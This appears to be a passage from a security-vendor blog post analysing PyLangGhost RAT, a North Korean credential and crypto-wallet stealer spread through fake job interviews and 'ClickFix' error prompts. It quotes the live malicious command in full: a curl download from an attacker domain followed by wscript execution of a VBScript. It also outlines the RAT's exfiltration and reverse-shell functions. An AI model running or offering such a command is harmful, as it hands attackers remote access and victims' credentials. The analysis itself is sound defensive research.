{"id":15287,"date":"2025-08-06T10:31:04","date_gmt":"2025-08-06T10:31:04","guid":{"rendered":"\/cybersecurity-blog\/?p=15287"},"modified":"2025-08-06T13:47:54","modified_gmt":"2025-08-06T13:47:54","slug":"pylangghost-malware-analysis","status":"publish","type":"post","link":"https:\/\/any.run\/cybersecurity-blog\/pylangghost-malware-analysis\/","title":{"rendered":"PyLangGhost RAT: Rising Stealer from Lazarus Group Striking Finance and Technology\u00a0"},"content":{"rendered":"\n<p><em>Editor\u2019s note:<\/em><strong><em>&nbsp;The current article is authored by Mauro Eldritch, offensive security expert and threat intelligence analyst. You can&nbsp;<\/em><\/strong><a href=\"https:\/\/x.com\/MauroEldritch\" target=\"_blank\" rel=\"noreferrer noopener\"><strong><em>find Mauro on X<\/em><\/strong><\/a><strong><em>.<\/em><\/strong>&nbsp;<\/p>\n\n\n\n<p>North Korean state-sponsored groups, such as Lazarus, continue to target the financial and cryptocurrency sectors with a variety of custom malware families. In previous research, we examined strains like <a href=\"https:\/\/any.run\/cybersecurity-blog\/invisibleferret-malware-analysis\/\" target=\"_blank\" rel=\"noreferrer noopener\">InvisibleFerret, Beavertail<\/a>, and <a href=\"https:\/\/any.run\/cybersecurity-blog\/ottercookie-malware-analysis\/\" target=\"_blank\" rel=\"noreferrer noopener\">OtterCookie<\/a>, often deployed through fake developer job interviews or staged business calls with executives. While these have been the usual suspects, a newer Lazarus subgroup,&nbsp;<strong>Famous Chollima<\/strong>, has recently introduced a fresh threat:&nbsp;<strong>PyLangGhost RAT<\/strong>, a Python-based evolution of GoLangGhostRAT.&nbsp;<\/p>\n\n\n\n<p>Unlike common malware that spreads through pirated software or infected USB drives, PyLangGhost RAT is delivered via highly targeted social engineering campaigns aimed at the technology, finance, and crypto industries, with developers and executives as prime victims. In these attacks, adversaries stage fake job interviews and trick their targets into believing that their browser is blocking access to the camera or microphone. The \u201csolution\u201d they offer is to run a script that supposedly grants permission. In reality, the script hands over full remote access to a North Korean operator.&nbsp;<\/p>\n\n\n\n<p>This sample was obtained from fellow researcher Heiner Garc\u00eda P\u00e9rez of BlockOSINT, who encountered it during a fake job recruitment attempt and documented his findings in an advisory. &nbsp;<\/p>\n\n\n\n<p>Let\u2019s break it down.&nbsp;<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"880\" height=\"393\" src=\"\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/1.png\" alt=\"\" class=\"wp-image-15293\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/1.png 880w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/1-300x134.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/1-768x343.png 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/1-370x165.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/1-270x121.png 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/1-740x330.png 740w\" sizes=\"(max-width: 880px) 100vw, 880px\" \/><figcaption class=\"wp-element-caption\"><em>A fake interview process. Source: BlockOSINT<\/em><\/figcaption><\/figure><\/div>\n\n\n<h2 class=\"wp-block-heading\">Key Takeaways&nbsp;<\/h2>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>Attribution:<\/strong> PyLangGhost RAT is linked to the North Korean Lazarus subgroup&nbsp;<em>Famous Chollima<\/em>, known for using highly targeted and creative intrusion methods.&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>Delivery Method: <\/strong>Distributed through \u201cClickFix\u201d social engineering, where victims are tricked into running malicious commands to supposedly fix a fake camera or microphone error during staged job interviews.&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>Core Components: <\/strong>The malware\u2019s main loader (nvidia.py) relies on multiple modules (config.py,&nbsp;api.py,&nbsp;command.py,&nbsp;util.py,&nbsp;auto.py) for persistence, C2 communication, command execution, data compression, and credential theft.&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>Credential &amp; Wallet Theft: <\/strong>Targets browser-stored credentials and cryptocurrency wallet data from extensions like MetaMask, BitKeep, Coinbase Wallet, and Phantom, using privilege escalation and Chrome encryption key decryption (including bypasses for Chrome v20+).&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>C2 Communication: <\/strong>Communicates over raw IP addresses with no TLS, using weak RC4\/MD5 encryption, but remains stealthy with very low initial detection rates (0\u20133 detections on VirusTotal).&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>Detection &amp; Analysis:<\/strong> <a href=\"https:\/\/app.any.run\/tasks\/275e3573-0b3e-4e77-afaf-fe99b935c510\/?utm_source=anyrunblog&amp;utm_medium=article&amp;utm_campaign=pylangghost_rat&amp;utm_term=060825&amp;utm_content=linktoservice\" target=\"_blank\" rel=\"noreferrer noopener\">Identified as 100\/100 malicious by ANY.RUN<\/a>, with telltale signs including the default&nbsp;python-requests&nbsp;User-Agent and multiple rapid requests to C2 infrastructure.&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>Code Origin: <\/strong>Appears to be a full Python reimplementation of GoLangGhost RAT, likely aided by AI, as indicated by Go-like logic patterns, unusual code structure, and large commented-out sections.&nbsp;<\/li>\n<\/ul>\n\n\n\n<h2 class=\"wp-block-heading\">The Fake Job Offer Trap&nbsp;<\/h2>\n\n\n\n<p>In the past, DPRK operators have resorted to creative methods to distribute malware, from staging fake job interviews and sharing bogus coding challenges (some laced with malware, others seemingly clean but invoking malicious dependencies at runtime), to posing as VCs in business calls, pretending not to hear the victim, and prompting them to download a fake Zoom fix or update.&nbsp;<\/p>\n\n\n\n<p>This case is a bit different. It falls into a newer category of attacks called&nbsp;<strong>\u201cClickFix\u201d<\/strong>&nbsp;\u2014 scenarios where the attacker, or one of their websites, presents the victim with fake CAPTCHAs or error messages that prevent them from completing an interview or coding challenge. The proposed fix is deceptively simple: copy a command shown on the website and paste it into a terminal or the Windows Run window (Win + R) to \u201csolve the issue.\u201d By doing so, users end up executing malicious scripts with their own privileges, or even worse, as Administrator, essentially handing control of the system to a Chollima operator.&nbsp;<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"844\" height=\"444\" src=\"\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/2.png\" alt=\"\" class=\"wp-image-15294\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/2.png 844w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/2-300x158.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/2-768x404.png 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/2-370x195.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/2-270x142.png 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/2-740x389.png 740w\" sizes=\"(max-width: 844px) 100vw, 844px\" \/><figcaption class=\"wp-element-caption\"><em>A fake &#8220;Race Condition&#8221; Error, prompting the user to run a command. Source: BlockOSINT<\/em><\/figcaption><\/figure><\/div>\n\n\n<p>In this case, the researcher received a fake job offer to work at the Aave DeFi Protocol. After a brief screening with a few generic questions, he was redirected to a page that began flooding him with notifications about an error dubbed&nbsp;<strong>\u201cRace Condition in Windows Camera Discovery Cache.\u201d<\/strong>&nbsp;<\/p>\n\n\n\n<p>Luckily, the website offered a quick fix for this \u201cproblem\u201d: just run a small code snippet in the terminal.&nbsp;<\/p>\n\n\n\n<p>But what does this code actually do? Let\u2019s find out.&nbsp;<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Chollimas &amp; Pythons&nbsp;<\/h2>\n\n\n\n<p>Let&#8217;s analyze the command:&nbsp;<\/p>\n\n\n\n<p><em>curl -k -o &#8220;%TEMP%\\nvidiaRelease.zip&#8221; https:\/\/360scanner.store\/cam-v-b74si.fix &amp;&amp; powershell -Command &#8220;Expand-Archive -Force -Path &#8216;%TEMP%\\nvidiaRelease.zip&#8217;<\/em>&nbsp;<\/p>\n\n\n\n<p><em>-DestinationPath &#8216;%TEMP%\\nvidiaRelease'&#8221; &amp;&amp; wscript &#8220;%TEMP%<\/em>&nbsp;<\/p>\n\n\n\n<p><em>\\nvidiaRelease\\update.vbs&#8221;<\/em>&nbsp;<\/p>\n\n\n\n<p>This line:&nbsp;<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Downloads a ZIP file from 360scanner[.]store using curl.&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Extracts it to the %TEMP%\\nvidiaRelease directory using PowerShell\u2019s Expand- Archive.&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Executes a VBScript named update.vbs via wscript.&nbsp;<\/li>\n<\/ul>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"364\" src=\"\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/3-1024x364.png\" alt=\"\" class=\"wp-image-15296\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/3-1024x364.png 1024w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/3-300x107.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/3-768x273.png 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/3-1536x545.png 1536w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/3-370x131.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/3-270x96.png 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/3-740x263.png 740w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/3.png 1656w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><figcaption class=\"wp-element-caption\"><em>update.vbs contents<\/em><\/figcaption><\/figure><\/div>\n\n\n<p>Now let\u2019s look at what this script actually does:<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">Inside&nbsp;update.vbs&nbsp;<\/h3>\n\n\n\n<p>It silently decompresses Lib.zip to the same directory, using tar, and waits for the extraction to finish, hiding any windows during the process.&nbsp;<\/p>\n\n\n\n<p>Then, it runs csshost.exe nvidia.py. The filename csshost.exe is mildly obfuscated by being split in two parts (&#8220;css&#8221; &amp; &#8220;host.exe&#8221;) before execution.&nbsp;<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">Disguised Python Environment&nbsp;<\/h3>\n\n\n\n<p>But what is csshost.exe?&nbsp;<\/p>\n\n\n\n<p>It\u2019s actually a renamed python.exe binary. Nothing more. No packing, no exotic tricks; just Python, rebranded.&nbsp;<\/p>\n\n\n\n<p>The Lib.zip file is a clean Python environment bundled with standard libraries, containing nothing malicious or unusual.&nbsp;<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"587\" src=\"\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/4-1024x587.png\" alt=\"\" class=\"wp-image-15297\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/4-1024x587.png 1024w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/4-300x172.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/4-768x440.png 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/4-1536x880.png 1536w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/4-2048x1173.png 2048w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/4-370x212.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/4-270x155.png 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/4-740x424.png 740w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><figcaption class=\"wp-element-caption\"><em>Lib.zip contents, clean<\/em><\/figcaption><\/figure><\/div>\n\n\n<h3 class=\"wp-block-heading\">A Decoy and Its Real Payload&nbsp;<\/h3>\n\n\n\n<p>Funny enough, if you try to download the same file manually with a different User- Agent, the server returns a legitimate driver instead \u2014 a clever decoy tactic.&nbsp;<\/p>\n\n\n\n<p>On the other hand, nvidia.py imports three additional components: api.py, config.py, and command.py. The last one, in turn, also uses util.py and auto.py. &nbsp;<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">Core Modules and Their Roles&nbsp;<\/h3>\n\n\n\n<p>Let\u2019s break down the 3 modules, starting with config.py.&nbsp;<\/p>\n\n\n\n<p>This file defines a set of constants used throughout the malware lifecycle, including message types, command codes, and operational parameters.&nbsp;<\/p>\n\n\n\n<p>Here\u2019s a quick reference of the command dictionary defined in config.py:&nbsp;<\/p>\n\n\n\n<div class=\"wpdt-c row wpDataTableContainerSimpleTable wpDataTables wpDataTablesWrapper\n\"\n    >\n        <table id=\"wpdtSimpleTable-245\"\n           style=\"border-collapse:collapse;\n                   border-spacing:0px;\"\n           class=\"wpdtSimpleTable wpDataTable\"\n           data-column=\"2\"\n           data-rows=\"11\"\n           data-wpID=\"245\"\n           data-responsive=\"0\"\n           data-has-header=\"1\">\n\n                    <thead>        <tr class=\"wpdt-cell-row \" >\n                                <th class=\"wpdt-cell \"\n                                            data-cell-id=\"A1\"\n                    data-col-index=\"0\"\n                    data-row-index=\"0\"\n                    style=\" width:50%;                    padding:10px;\n                    \"\n                    >\n                                        Code                    <\/th>\n                                                <th class=\"wpdt-cell \"\n                                            data-cell-id=\"B1\"\n                    data-col-index=\"1\"\n                    data-row-index=\"0\"\n                    style=\" width:50%;                    padding:10px;\n                    \"\n                    >\n                                        Function                    <\/th>\n                                        <\/tr>\n                    <tbody>        <tr class=\"wpdt-cell-row \" >\n                                <td class=\"wpdt-cell \"\n                                            data-cell-id=\"A2\"\n                    data-col-index=\"0\"\n                    data-row-index=\"1\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        qwer\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell \"\n                                            data-cell-id=\"B2\"\n                    data-col-index=\"1\"\n                    data-row-index=\"1\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        Get system information\u00a0                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row \" >\n                                <td class=\"wpdt-cell \"\n                                            data-cell-id=\"A3\"\n                    data-col-index=\"0\"\n                    data-row-index=\"2\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        asdf\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell \"\n                                            data-cell-id=\"B3\"\n                    data-col-index=\"1\"\n                    data-row-index=\"2\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        Upload a file\u00a0                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row \" >\n                                <td class=\"wpdt-cell \"\n                                            data-cell-id=\"A4\"\n                    data-col-index=\"0\"\n                    data-row-index=\"3\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        zxcv\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell \"\n                                            data-cell-id=\"B4\"\n                    data-col-index=\"1\"\n                    data-row-index=\"3\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        Download a file\u00a0                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row \" >\n                                <td class=\"wpdt-cell \"\n                                            data-cell-id=\"A5\"\n                    data-col-index=\"0\"\n                    data-row-index=\"4\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        vbcx\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell \"\n                                            data-cell-id=\"B5\"\n                    data-col-index=\"1\"\n                    data-row-index=\"4\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        Open a terminal session\u00a0                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row \" >\n                                <td class=\"wpdt-cell \"\n                                            data-cell-id=\"A6\"\n                    data-col-index=\"0\"\n                    data-row-index=\"5\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        qalp\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell \"\n                                            data-cell-id=\"B6\"\n                    data-col-index=\"1\"\n                    data-row-index=\"5\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        Detach terminal (background)\u00a0                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row \" >\n                                <td class=\"wpdt-cell \"\n                                            data-cell-id=\"A7\"\n                    data-col-index=\"0\"\n                    data-row-index=\"6\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        ghd\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell \"\n                                            data-cell-id=\"B7\"\n                    data-col-index=\"1\"\n                    data-row-index=\"6\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        Wait\u00a0                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row \" >\n                                <td class=\"wpdt-cell \"\n                                            data-cell-id=\"A8\"\n                    data-col-index=\"0\"\n                    data-row-index=\"7\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        89io\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell \"\n                                            data-cell-id=\"B8\"\n                    data-col-index=\"1\"\n                    data-row-index=\"7\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        Gather Chrome extension data\u00a0                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row \" >\n                                <td class=\"wpdt-cell \"\n                                            data-cell-id=\"A9\"\n                    data-col-index=\"0\"\n                    data-row-index=\"8\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        gi%#\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell \"\n                                            data-cell-id=\"B9\"\n                    data-col-index=\"1\"\n                    data-row-index=\"8\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        Exfiltrate Chrome cookie store\u00a0                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row \" >\n                                <td class=\"wpdt-cell \"\n                                            data-cell-id=\"A10\"\n                    data-col-index=\"0\"\n                    data-row-index=\"9\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        kyci\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell \"\n                                            data-cell-id=\"B10\"\n                    data-col-index=\"1\"\n                    data-row-index=\"9\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        Exfiltrate Chrome keychain\u00a0                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row \" >\n                                <td class=\"wpdt-cell \"\n                                            data-cell-id=\"A11\"\n                    data-col-index=\"0\"\n                    data-row-index=\"10\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        dghh\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell \"\n                                            data-cell-id=\"B11\"\n                    data-col-index=\"1\"\n                    data-row-index=\"10\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        Exit the implant\u00a0                    <\/td>\n                                        <\/tr>\n                    <\/table>\n<\/div><style id='wpdt-custom-style-245'>\ntable#wpdtSimpleTable-245{ table-layout: fixed !important; }\ntable#wpdtSimpleTable-245 td, table.wpdtSimpleTable245 th { white-space: normal !important; }\n<\/style>\n\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"858\" height=\"882\" src=\"\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/5.png\" alt=\"\" class=\"wp-image-15298\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/5.png 858w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/5-292x300.png 292w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/5-768x789.png 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/5-370x380.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/5-270x278.png 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/5-740x761.png 740w\" sizes=\"(max-width: 858px) 100vw, 858px\" \/><figcaption class=\"wp-element-caption\"><em>Command dictionary on config.py<\/em><\/figcaption><\/figure><\/div>\n\n\n<p>Immediately after that, a C2 server based in the United Kingdom is declared (some sources indicate &#8220;Private Client &#8211; Iran&#8221;), along with a registry key used for persistence, and a list of Chrome extensions targeted for exfiltration,&nbsp;including MetaMask, BitKeep, Coinbase Wallet, and Phantom.&nbsp;<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"960\" height=\"1024\" src=\"\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/6-960x1024.png\" alt=\"\" class=\"wp-image-15299\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/6-960x1024.png 960w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/6-281x300.png 281w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/6-768x819.png 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/6-370x395.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/6-270x288.png 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/6-740x789.png 740w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/6.png 1262w\" sizes=\"(max-width: 960px) 100vw, 960px\" \/><figcaption class=\"wp-element-caption\"><em>Extensions list, C2 server and persistence key<\/em><\/figcaption><\/figure><\/div>\n\n\n<p>Coming up next, <strong>api.py<\/strong> manages communication with the C2 server we just saw on config.py. There are three main functions:&nbsp;<\/p>\n\n\n\n<ol start=\"1\" class=\"wp-block-list\">\n<li>Packet0623make, which resorts to RC4 cipher to encrypt data in transmission, builds a packet and computes a checksum. RC4 is obsolete and weak but simple, which may explain why that choice.&nbsp;<\/li>\n<\/ol>\n\n\n\n<ol start=\"2\" class=\"wp-block-list\">\n<li>Packet0623decode, which validates the checksum and decrypts the packet.&nbsp;<\/li>\n<\/ol>\n\n\n\n<ol start=\"3\" class=\"wp-block-list\">\n<li>Htxp0623Exchange, which simply posts the packet to the server without TLS encryption, thus making the RC4 and MD5 cocktail an even weaker choice.&nbsp;<\/li>\n<\/ol>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"860\" src=\"\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/7-1024x860.png\" alt=\"\" class=\"wp-image-15300\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/7-1024x860.png 1024w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/7-300x252.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/7-768x645.png 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/7-370x311.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/7-270x227.png 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/7-740x621.png 740w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/7.png 1072w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><figcaption class=\"wp-element-caption\"><em>Package building using RC4<\/em><\/figcaption><\/figure><\/div>\n\n\n<p>Now <strong>command.py<\/strong> acts as a dispatcher, interpreting both malware logic and C2 communications, and executing instructions accordingly. It also handles status messages defined in the config.py module we examined earlier.&nbsp;<\/p>\n\n\n\n<p>The key functions are:&nbsp;<\/p>\n\n\n\n<div class=\"wpdt-c row wpDataTableContainerSimpleTable wpDataTables wpDataTablesWrapper\n\"\n    >\n        <table id=\"wpdtSimpleTable-246\"\n           style=\"border-collapse:collapse;\n                   border-spacing:0px;\"\n           class=\"wpdtSimpleTable wpDataTable\"\n           data-column=\"2\"\n           data-rows=\"7\"\n           data-wpID=\"246\"\n           data-responsive=\"0\"\n           data-has-header=\"1\">\n\n                    <thead>        <tr class=\"wpdt-cell-row \" >\n                                <th class=\"wpdt-cell \"\n                                            data-cell-id=\"A1\"\n                    data-col-index=\"0\"\n                    data-row-index=\"0\"\n                    style=\" width:50%;                    padding:10px;\n                    \"\n                    >\n                                        Function\u00a0                    <\/th>\n                                                <th class=\"wpdt-cell \"\n                                            data-cell-id=\"B1\"\n                    data-col-index=\"1\"\n                    data-row-index=\"0\"\n                    style=\" width:50%;                    padding:10px;\n                    \"\n                    >\n                                        Description\u00a0                    <\/th>\n                                        <\/tr>\n                    <tbody>        <tr class=\"wpdt-cell-row \" >\n                                <td class=\"wpdt-cell \"\n                                            data-cell-id=\"A2\"\n                    data-col-index=\"0\"\n                    data-row-index=\"1\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        ProcessInfo\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell \"\n                                            data-cell-id=\"B2\"\n                    data-col-index=\"1\"\n                    data-row-index=\"1\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        Collects the current user, hostname, OS, architecture, and the malware (daemon) version.\u00a0\u00a0                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row \" >\n                                <td class=\"wpdt-cell \"\n                                            data-cell-id=\"A3\"\n                    data-col-index=\"0\"\n                    data-row-index=\"2\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        ProcessUpload\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell \"\n                                            data-cell-id=\"B3\"\n                    data-col-index=\"1\"\n                    data-row-index=\"2\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        Allows the attacker to upload compressed files to the victim\u2019s machine.\u00a0                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row \" >\n                                <td class=\"wpdt-cell \"\n                                            data-cell-id=\"A4\"\n                    data-col-index=\"0\"\n                    data-row-index=\"3\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        ProcessDownload\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell \"\n                                            data-cell-id=\"B4\"\n                    data-col-index=\"1\"\n                    data-row-index=\"3\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        Stages files or folders for exfiltration. If the target is a folder, it gets compressed before transmission.\u00a0                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row \" >\n                                <td class=\"wpdt-cell \"\n                                            data-cell-id=\"A5\"\n                    data-col-index=\"0\"\n                    data-row-index=\"4\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        ProcessTerminal\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell \"\n                                            data-cell-id=\"B5\"\n                    data-col-index=\"1\"\n                    data-row-index=\"4\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        Opens a reverse shell or executes arbitrary commands, depending on the mode selected.\u00a0                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row \" >\n                                <td class=\"wpdt-cell \"\n                                            data-cell-id=\"A6\"\n                    data-col-index=\"0\"\n                    data-row-index=\"5\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        makeMsg0623 \/ decodeMsg0623\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell \"\n                                            data-cell-id=\"B6\"\n                    data-col-index=\"1\"\n                    data-row-index=\"5\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        Serialize and deserialize base64-encoded messages exchanged between implant and C2.\u00a0                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row \" >\n                                <td class=\"wpdt-cell \"\n                                            data-cell-id=\"A7\"\n                    data-col-index=\"0\"\n                    data-row-index=\"6\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        ProcessAuto:\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell \"\n                                            data-cell-id=\"B7\"\n                    data-col-index=\"1\"\n                    data-row-index=\"6\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        Triggers automation routines from the auto.py module\u00a0                    <\/td>\n                                        <\/tr>\n                    <\/table>\n<\/div><style id='wpdt-custom-style-246'>\ntable#wpdtSimpleTable-246{ table-layout: fixed !important; }\ntable#wpdtSimpleTable-246 td, table.wpdtSimpleTable246 th { white-space: normal !important; }\n<\/style>\n\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"987\" height=\"1024\" src=\"\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/8-987x1024.png\" alt=\"\" class=\"wp-image-15301\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2025\/08\/8-987x1024.png 987w, 